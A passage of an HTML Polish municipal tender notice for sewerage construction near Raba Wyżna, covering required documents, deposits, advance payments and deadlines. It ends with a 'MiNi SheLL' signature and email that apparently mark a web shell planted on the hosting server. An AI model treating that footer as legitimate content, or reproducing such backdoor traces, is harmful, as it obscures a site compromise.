braku<br/>podstaw wykluczenia z postępowania, na podstawie art. 125 ust. 1 ustawy Pzp, zgodnie z treścią<br/>załącznika nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Na wykazanie spełniania warunków udziału w postępowaniu Wykonawca<br/>składa wstępne oświadczenie dotyczące spełnienia warunków udziału w postępowaniu, na podstawie art. 125 ust. 1 ustawy Pzp, zgodnie z treścią zał. nr 3 do SWZ.<br/>2. Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>a) Dla części I zamówienia:<br/>1) informację z banku lub spółdzielczej kasy oszczędnościowo – kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy nie mniejszą niż 30 % wartości oferty, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem;<br/>2) dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną minimum 1 000 000,00 zł ( jeden milion złotych 00/100).<br/>3) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej – zał. nr 5 do SWZ;<br/>4) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>5) wykaz robót budowlanych w zakresie budowy kanalizacji sanitarnej wykonanych nie wcześniej niż w<br/>okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - zał. nr 7 do SWZ;<br/>6) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego odpowiedzialnych za kierowanie robotami budowlanymi -wykaz należy przygotować zgodnie ze<br/>wzorem określonym w zał. nr 7A do SWZ;<br/><br/>b) Dla części II zamówienia:<br/>1) informację z banku lub spółdzielczej kasy oszczędnościowo – kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy nie mniejszą niż 30 % wartości oferty, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem;<br/>2) dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną minimum 500 000,00 zł (pięćset tysięcy złotych 00/100);<br/>3) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej – zał. nr 5 do SWZ;<br/>4) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>5) wykaz robót budowlanych w zakresie budowy kanalizacji sanitarnej wykonanych nie wcześniej niż w<br/>okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - zał. nr 7 do SWZ;<br/>6) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za kierowanie robotami budowlanymi - Wykaz należy przygotować zgodnie ze<br/>wzorem określonym w zał. nr 7A do SWZ;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oferta (wypełniony formularz ofertowy zgodny ze wzorem stanowiącym załącznik nr 1 do<br/>SWZ).<br/>2. Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3. Pełnomocnictwo do występowania w imieniu wykonawcy w przypadku, gdy dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentowania wykonawcy zgodnie z dokumentem rejestrowym wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium -dla każdej części niezależnie w wysokości: <br/>Składając ofertę na część I:<br/>80 000,00 zł (słownie: osiemdziesiąt tysięcy złotych 00/100 złotych);<br/>Składając ofertę na część II:<br/>50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100 złotych);<br/> 2. W przypadku złożenia oferty na obie części należy wpłacić wadium niezależnie dla każdej części osobno.<br/> 3. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 21.<br/> 4. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/> 1) pieniądzu; <br/> 2) gwarancjach bankowych;<br/> 3) gwarancjach ubezpieczeniowych;<br/> 4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości2.<br/> 5. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:<br/> Bank spółdzielczy Raba Wyżna <br/> nr rachunku 18 8815 0002 0000 0000 0260 0003 <br/> z dopiskiem <br/>dla części I - „Wadium – ZP.271.4.2022 – Kanalizacja – Raba – Rokiciny-jeden”.<br/>dla części II - „Wadium – ZP.271.4.2022 – Kanalizacja – Raba – Rokiciny-dwa”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/><br/> Szczegóły dotyczące Wadium Opisane są w rozdziale XIV SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VIII ust. 2 pkt 2.2 oraz 2.3 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy (załącznik nr 9).<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1. Zaliczka nie może być mniejsza niż 5% i większa niż 10% wynagrodzenia należnego Wykonawcy.<br/>2. Zamawiający udzieli zaliczkę na pisemny wniosek Wykonawcy. W przypadku niezłożenia wniosku o zaliczkę w terminie do 60 dni od dnia zawarcia umowy, zostanie ona wypłacona w wysokości 5% wynagrodzenia należnego Wykonawcy.<br/>3. Wykonawca we wniosku o udzielenie zaliczki wskaże, na podstawie zaakceptowanego Harmonogramu rzeczowo - terminowo - finansowego, zakres robót, na których realizację wykorzysta zaliczkę, a także formę wniesienia zabezpieczenia zaliczki.<br/>4. Termin rozliczenia zaliczki ustala się na dzień odbioru końcowego wykonanych prac budowlanych.<br/>5. Zamawiający może zażądać wniesienia zabezpieczenia zaliczki - wówczas warunkiem przyznania zaliczki jest wniesienie 100% jej zabezpieczenia.<br/>6. Zabezpieczenie zaliczki może być wniesione w formie:<br/>a) gwarancji bankowej,<br/>b) gwarancji ubezpieczeniowej.<br/>Zamawiający przewiduje możliwość zmiany formy zabezpieczenia zaliczki w trakcie realizacji umowy.<br/>7. Dokument gwarancyjny musi bezwarunkowo gwarantować wypłatę na rzecz Zamawiającego kwoty zaliczki w przypadku jej nieterminowego rozliczenia i musi być płatnym na pierwsze żądanie Zamawiającego. Treść dokumentu gwarancyjnego zabezpieczenia zaliczki podlega akceptacji Zamawiającego.<br/>8. Ważność dokumentu gwarancyjnego powinna mijać nie wcześniej niż 60 dni od dnia, w którym przypada termin rozliczenia zaliczki wskazany we wniosku, o którym mowa w ust. 4.<br/>9. Zamawiający zwraca zabezpieczenie zaliczki w terminie 14 dni od dnia jej rozliczenia. Za rozliczenie zaliczki uznaje się odbiór prac zrealizowanych z udzielonej zaliczki oraz przedstawienie dowodów zapłaty wymagalnego wynagrodzenia podwykonawcom i dalszym podwykonawcom, biorącym udział w realizacji części zamówienia, na którą zaliczka została wypłacona, tj. dokumentów, o których mowa w § 2 ust. 3 projektowych postanowień umowy.<br/>10. Zamawiający może zażądać zwrotu udzielonej zaliczki w przypadku, gdy opóźnienie realizacji jakiegokolwiek elementu robót ujętego w zaakceptowanym harmonogramie, o którym mowa w ust. 3 przekracza 14 dni w stosunku do terminów w nim określonych.<br/>11. W nieprzewidzianych, wyjątkowych, uzasadnionych sytuacjach Zamawiający na wniosek Wykonawcy może dopuścić rozliczenie zaliczki w innym terminie. Przedłużenie terminu rozliczenia zaliczki na wniosek Wykonawcy jest uwarunkowane przedłużeniem terminu ważności zabezpieczenia zaliczki.<br/>12. Nierozliczenie zaliczki w ustalonym terminie wyłączając sytuację opisaną w ust. 11 spowoduje niezwłoczne wystąpienie Zamawiającego do Gwaranta o jej zwrot w wysokości<br/>nierozliczonej. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 Pzp oraz wskazanym we Wzorze Umowy, stanowiącym załącznik nr 6 do SWZ.<br/>2. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-24 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://e-zp.rabawyzna.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-24 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com